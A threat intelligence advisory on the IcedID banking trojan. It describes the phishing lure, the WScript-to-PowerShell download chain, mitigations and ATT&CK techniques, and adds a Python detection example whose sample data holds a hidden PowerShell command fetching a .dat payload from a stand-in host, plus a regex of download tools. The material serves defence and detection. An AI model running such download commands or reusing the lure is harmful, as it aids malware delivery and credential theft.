IcedID Banking Trojan Malware Threat Intel Advisory

CloudSEK threat intelligence advisory on the IcedID banking trojan, malware that steals financial information and also acts as a dropper for other malware.
Updated on: April 19, 2023
Published on: May 10, 2021
Advisory Type: Malware Intelligence
Malware Name: IcedID
Malware Aliases:
Malware Type: Banking Trojan
Target OS:
Executive Summary

First observed in 2017, IcedID is a banking trojan that steals financial information. It has also been used as a dropper for other malware and in the initial infection stage of ransomware operations. The malware is distributed through several delivery methods, of which phishing emails with macro-embedded attachments are the most prevalent. In a recent IcedID campaign, attackers abused the website contact forms of multiple enterprises to send emails containing malicious links; clicking a link downloaded a malicious .zip file. These emails typically create a sense of urgency to provoke immediate action: for instance, the sender poses as a photographer threatening legal action against the company for using his photos on its site without permission, and shares a link that purports to be evidence of the infringement. Clicking the link instead takes the recipient to a Google page that downloads the malicious .zip file.

Technical Analysis

The phishing emails used in IcedID campaigns contain a malicious link that, when clicked, loads a Google page. This page asks the unsuspecting victim to sign in with their Google credentials; once signed in, a malicious zip file is automatically downloaded to the victim's machine. If the first link fails, the victim is redirected to a .top domain, which in turn leads to a Google User Content page that downloads the malicious zip file.

Stages of execution:
  • The zip file contains a malicious JavaScript file that is executed via WScript.
  • The JavaScript file creates a Shell object.
  • The Shell object launches PowerShell to download the IcedID payload as a .dat file.
  • The IcedID payload is encrypted to evade detection.
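As an added example, not part of the CloudSEK advisory, the detection logic below walks process-creation events for the chain described above: a script host (wscript.exe) launching PowerShell with a download command that fetches a .dat file. The events, process IDs, paths and command lines are constructed sample data in a Sysmon-like shape, not real telemetry.

```python
import re

# Constructed process-creation events (Sysmon Event ID 1 style fields). Not real telemetry.
EVENTS = [
    {"pid": 4101, "ppid": 3200, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 4120, "ppid": 4101, "image": r"C:\Windows\System32\wscript.exe",
     "cmd": r'wscript.exe "C:\Users\alice\Downloads\evidence\photos.js"'},
    {"pid": 4133, "ppid": 4120,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r'powershell.exe -w hidden -c "Invoke-WebRequest http://example.invalid/loader.dat '
            r'-OutFile $env:TEMP\loader.dat"'},
    # Benign admin PowerShell launched from Explorer: must not alert.
    {"pid": 5001, "ppid": 4101,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"powershell.exe -File C:\scripts\inventory.ps1"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
DOWNLOAD_RE = re.compile(r"invoke-webrequest|iwr|downloadfile|downloadstring|"
                         r"start-bitstransfer|curl|wget", re.I)


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect_icedid_chain(events):
    """Return one alert per PowerShell process whose parent is a script host.

    Each alert lists the matched indicators; the score is the indicator count,
    so the full chain (script host -> PowerShell -> download of a .dat file) scores 4.
    """
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        if basename(e["image"]) != "powershell.exe":
            continue
        parent = by_pid.get(e["ppid"])
        if parent is None or basename(parent["image"]) not in SCRIPT_HOSTS:
            continue
        reasons = ["powershell spawned by script host"]
        if DOWNLOAD_RE.search(e["cmd"]):
            reasons.append("download command in powershell command line")
        if re.search(r"\.dat\b", e["cmd"], re.I):
            reasons.append(".dat payload referenced")
        if re.search(r"\.js\b", parent["cmd"], re.I):
            reasons.append("script host executed a .js file")
        alerts.append({"pid": e["pid"], "parent_pid": parent["pid"],
                       "reasons": reasons, "score": len(reasons)})
    return alerts


if __name__ == "__main__":
    for alert in detect_icedid_chain(EVENTS):
        print(alert)
```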


Technical Impact
  • IcedID is a banking trojan that steals the victim's banking credentials and other financial information from the infected system and sends the gathered data to the attacker's C2 server.
  • IcedID also acts as a loader for other payloads such as ransomware, enabling further attacks.
Business Impact
  • The banking trojan violates the privacy of its victims and abuses their financial information.
  • A follow-on ransomware infection has an adverse impact on the business and its reputation.

Mitigation Measures
  • Raise awareness about phishing emails and malicious links.
  • Use Multi-Factor Authentication for all accounts.
  • Patch systems promptly and keep software up to date.
  • Use up-to-date antivirus software.

Tactics, Techniques, and Procedures

Reconnaissance
T1594 Search Victim-Owned Websites
Initial Access
T1566.001 Spearphishing Attachment
T1566.002 Spearphishing Link
T1078.002 Domain Accounts
Execution
T1059 Command and Scripting Interpreter
T1059.001 PowerShell
T1053.005 Scheduled Task
T1204.001 Malicious Link
T1047 Windows Management Instrumentation
Persistence
T1053.005 Scheduled Task
Privilege Escalation
T1055 Process Injection
T1053.005 Scheduled Task
Defense Evasion
T1055 Process Injection
T1218.011 Rundll32
T1553.002 Code Signing
Credential Access
T1555.003 Credentials from Web Browsers
Discovery
T1482 Domain Trust Discovery
T1018 Remote System Discovery
T1518.001 Security Software Discovery
T1082 System Information Discovery
T1016 System Network Configuration Discovery
Lateral Movement
T1021.001 Remote Desktop Protocol
T1021.002 SMB/Windows Admin Shares
Collection
T1185 Man in the Browser
Command and Control
T1071 Application Layer Protocol
Exfiltration
T1048.002 Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact
T1486 Data Encrypted for Impact

Indicators of Compromise

File Hash – SHA1
